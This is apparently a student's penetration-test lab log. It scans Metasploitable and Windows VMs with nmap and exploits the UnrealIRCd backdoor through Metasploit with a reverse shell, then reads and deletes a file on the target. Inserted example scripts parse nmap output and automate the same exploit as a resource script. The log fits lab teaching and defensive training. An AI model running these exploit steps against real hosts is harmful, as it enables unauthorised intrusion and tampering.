pentest log

friday 19
re-imported kali VM (newest 2021 version may have different settings from 2020.4)
checked that all VMs are using NatNetwork
launched KaliVM and msVM
logged in to both VMs
obtained IP addresses for both machines using ifconfig: msVM is 10.0.2.4, KaliVM is 10.0.2.15
pinged from KaliVM to msVM successfully
created target.txt file on msVM and inserted some text, saved the file in home directory
used touch and then nano editor
nmap
carried out nmap scan of target
nmap -v -A 10.0.2.4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-19 06:45 EDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:45
Completed NSE at 06:45, 0.00s elapsed
Initiating NSE at 06:45
Completed NSE at 06:45, 0.00s elapsed
Initiating NSE at 06:45
Completed NSE at 06:45, 0.00s elapsed
Initiating Ping Scan at 06:45
Scanning 10.0.2.4 [2 ports]
Completed Ping Scan at 06:45, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:45
Completed Parallel DNS resolution of 1 host. at 06:45, 0.02s elapsed
Initiating Connect Scan at 06:45
Scanning 10.0.2.4 [1000 ports]
Discovered open port 445/tcp on 10.0.2.4
Discovered open port 25/tcp on 10.0.2.4
Discovered open port 5900/tcp on 10.0.2.4
Discovered open port 3306/tcp on 10.0.2.4
Discovered open port 139/tcp on 10.0.2.4
Discovered open port 53/tcp on 10.0.2.4
Discovered open port 21/tcp on 10.0.2.4
Discovered open port 23/tcp on 10.0.2.4
Discovered open port 80/tcp on 10.0.2.4
Discovered open port 22/tcp on 10.0.2.4
Discovered open port 111/tcp on 10.0.2.4
Discovered open port 6667/tcp on 10.0.2.4
Discovered open port 1524/tcp on 10.0.2.4
Discovered open port 1099/tcp on 10.0.2.4
Discovered open port 513/tcp on 10.0.2.4
Discovered open port 2049/tcp on 10.0.2.4
Discovered open port 512/tcp on 10.0.2.4
Discovered open port 514/tcp on 10.0.2.4
Discovered open port 5432/tcp on 10.0.2.4
Discovered open port 8009/tcp on 10.0.2.4
Discovered open port 2121/tcp on 10.0.2.4
Discovered open port 6000/tcp on 10.0.2.4
Discovered open port 8180/tcp on 10.0.2.4
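Added example (not part of the original log): a small shell helper that turns the open-port lines nmap prints into a comma-separated list, ready for a focused follow-up scan (`nmap -sV -sC -p "$PORTS" 10.0.2.4`). It goes slightly beyond the scan above in that it accepts both formats that appear in this log: the "Discovered open port" progress lines from `nmap -v` and the final PORT STATE SERVICE table. The samples are constructed from the scan output on this page (one verbose line repeated to show de-duplication); `open_ports` and `has_port` are names chosen here, not nmap features.

```shell
#!/bin/sh
# Added example, not from the original log. Extracts open ports from nmap output.
# Accepted input formats (everything else is ignored: headers, "Not shown:", timing):
#   "Discovered open port 445/tcp on 10.0.2.4"   progress lines from nmap -v
#   "445/tcp open microsoft-ds"                  the final PORT STATE SERVICE table
# Only definite "open" rows are taken; "open|filtered" is deliberately left out.

# Constructed sample 1: a subset of the verbose lines from the Friday scan,
# with 445 repeated to show that duplicates collapse.
SAMPLE_VERBOSE='Discovered open port 445/tcp on 10.0.2.4
Discovered open port 25/tcp on 10.0.2.4
Discovered open port 5900/tcp on 10.0.2.4
Discovered open port 3306/tcp on 10.0.2.4
Discovered open port 139/tcp on 10.0.2.4
Discovered open port 53/tcp on 10.0.2.4
Discovered open port 21/tcp on 10.0.2.4
Discovered open port 23/tcp on 10.0.2.4
Discovered open port 80/tcp on 10.0.2.4
Discovered open port 22/tcp on 10.0.2.4
Discovered open port 111/tcp on 10.0.2.4
Discovered open port 6667/tcp on 10.0.2.4
Discovered open port 445/tcp on 10.0.2.4'

# Constructed sample 2: the PORT STATE SERVICE table from the Monday Windows scan,
# including the surrounding lines that must be ignored.
SAMPLE_TABLE='Not shown: 994 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
3389/tcp open ms-wbt-server
5000/tcp open upnp
MAC Address: 08:00:27:03:4E:4D (Oracle VirtualBox virtual NIC)'

# open_ports: reads nmap output on stdin; prints the unique open TCP/UDP port
# numbers, numerically sorted, comma-separated, on a single line.
open_ports() {
    sed -n -E \
        -e 's#^Discovered open port ([0-9]+)/(tcp|udp) on .*#\1#p' \
        -e 's#^([0-9]+)/(tcp|udp) +open .*#\1#p' |
        sort -n -u | paste -s -d, -
}

# has_port LIST PORT: succeeds (exit 0) if PORT is one of the entries in the
# comma-separated LIST produced by open_ports.
has_port() {
    printf '%s\n' "$1" | tr ',' '\n' | grep -qx "$2"
}

# Usage: build the follow-up command for the Metasploitable host and flag IRC.
PORTS=$(printf '%s\n' "$SAMPLE_VERBOSE" | open_ports)
echo "nmap -sV -sC -p $PORTS 10.0.2.4"
if has_port "$PORTS" 6667; then
    echo "6667/tcp is open: identify the IRC daemon and version before choosing a module"
fi
```

The regex only matches rows whose state is exactly `open`, so `open|filtered` results from a UDP or null scan do not sneak into the `-p` list; widen the second pattern if that is wanted.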
zenmap not available
explored legion instead (runs as sudo)
legion allows session results to be saved to a file
auto-screenshots services such as the web server home page, Tomcat home page, DB and FTP
lists CVE vulnerabilities with hyperlinks to the CVE database
setting up metasploit framework
sudo /etc/init.d/postgresql start
sudo msfdb init
msfconsole
find an exploit
search unrealircd
> exploit/unix/irc/unreal_ircd_3281_backdoor
deploy exploit
use exploit/unix/irc/unreal_ircd_3281_backdoor
configure
set RHOST 10.0.2.4
set LHOST 10.0.2.15
show payloads
>
Compatible Payloads
===================

   #   Name                                  Disclosure Date  Rank    Check  Description
   -   ----                                  ---------------  ----    -----  -----------
   0   cmd/unix/bind_perl                                     normal  No     Unix Command Shell, Bind TCP (via Perl)
   1   cmd/unix/bind_perl_ipv6                                normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   2   cmd/unix/bind_ruby                                     normal  No     Unix Command Shell, Bind TCP (via Ruby)
   ..
   11  cmd/unix/reverse_ssl_double_telnet                     normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
deliver payload
set payload cmd/unix/reverse
exploit
explore target using shell
ifconfig
whoami
pwd
cd /
cd home
ls
cd msfadmin
cat target.txt
touch hacked.txt
rm target.txt
ls
finishing metasploitable session
ctrl + c
quit
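Added example (not part of the original log): the msfconsole steps of the Friday session written out as a resource script (.rc), so the module selection, options, payload and launch can be replayed with one command (`msfconsole -q -r unreal.rc`) instead of retyped. It assumes the lab addresses from this log (target 10.0.2.4, Kali 10.0.2.15) and an arbitrary listener port 4444 that the log does not specify; `is_ipv4`, `build_rc` and `run_rc` are helper names chosen here. `RHOSTS` is the current option name in msf6; `set RHOST` as typed in the log is accepted as an alias.

```shell
#!/bin/sh
# Added example, not from the original log: generate and run a Metasploit resource
# script for exploit/unix/irc/unreal_ircd_3281_backdoor.
# Assumed values: target 10.0.2.4, Kali 10.0.2.15 (from the log), LPORT 4444 (chosen here).

# is_ipv4 ADDR: rough dotted-quad check. Every line of the .rc is executed by
# msfconsole, so an unchecked argument could smuggle extra commands into it.
is_ipv4() {
    printf '%s' "$1" | grep -Eqx '([0-9]{1,3}\.){3}[0-9]{1,3}'
}

# build_rc RHOSTS LHOST LPORT: print the resource script to stdout.
# The payload is selected before its LHOST/LPORT options, the order msfconsole
# expects; "exploit -z" launches the module and does not drop into the session.
build_rc() {
    is_ipv4 "$1" && is_ipv4 "$2" || return 1
    case "$3" in
        ''|*[!0-9]*) return 1 ;;
    esac
    cat <<EOF
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOSTS $1
set payload cmd/unix/reverse
set LHOST $2
set LPORT $3
exploit -z
EOF
}

# run_rc RHOSTS LHOST LPORT: write the script to a temp file and run it when
# msfconsole is installed; otherwise leave the file for inspection.
run_rc() {
    rc=$(mktemp) || return 1
    build_rc "$@" > "$rc" || { rm -f "$rc"; echo "bad arguments" >&2; return 1; }
    if command -v msfconsole >/dev/null 2>&1; then
        msfconsole -q -r "$rc"
    else
        echo "msfconsole not found; resource script left at $rc" >&2
        return 2
    fi
}

# Usage: show the script that would be run for the Friday lab targets.
build_rc 10.0.2.4 10.0.2.15 4444
```

After `exploit -z` the session is backgrounded; `sessions -l` then `sessions -i 1` gives the same shell the log explores by hand (ifconfig, whoami, cat target.txt). Add those as further `sessions -C` lines to the .rc if the whole walk-through should be scripted.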
monday 22
Setting up Kali and Windows

Kali settings: internal network
image.png
Windows sp0: network
image.png
Secret file on Windows
image.png
TCP/IP properties for Windows
image.png
Kali net settings (right click network icon in top right)
image.png
check for confirmation of network (manual setting for IPv4)
Testing Kali - Windows network connection: ping
image.png
Hacking Windows from Kali
nmap scan needs sudo
sudo nmap -sN 10.0.2.0/24
image.png
port scanner
sudo nmap -PS 10.0.2.16
>
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-22 11:19 EDT
Nmap scan report for 10.0.2.16
Host is up (0.00032s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
3389/tcp open ms-wbt-server
5000/tcp open upnp
MAC Address: 08:00:27:03:4E:4D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds
fingerprint the target
sudo nmap -O --osscan-guess 10.0.2.16
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-22 11:22 EDT
Nmap scan report for 10.0.2.16
Host is up (0.00055s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn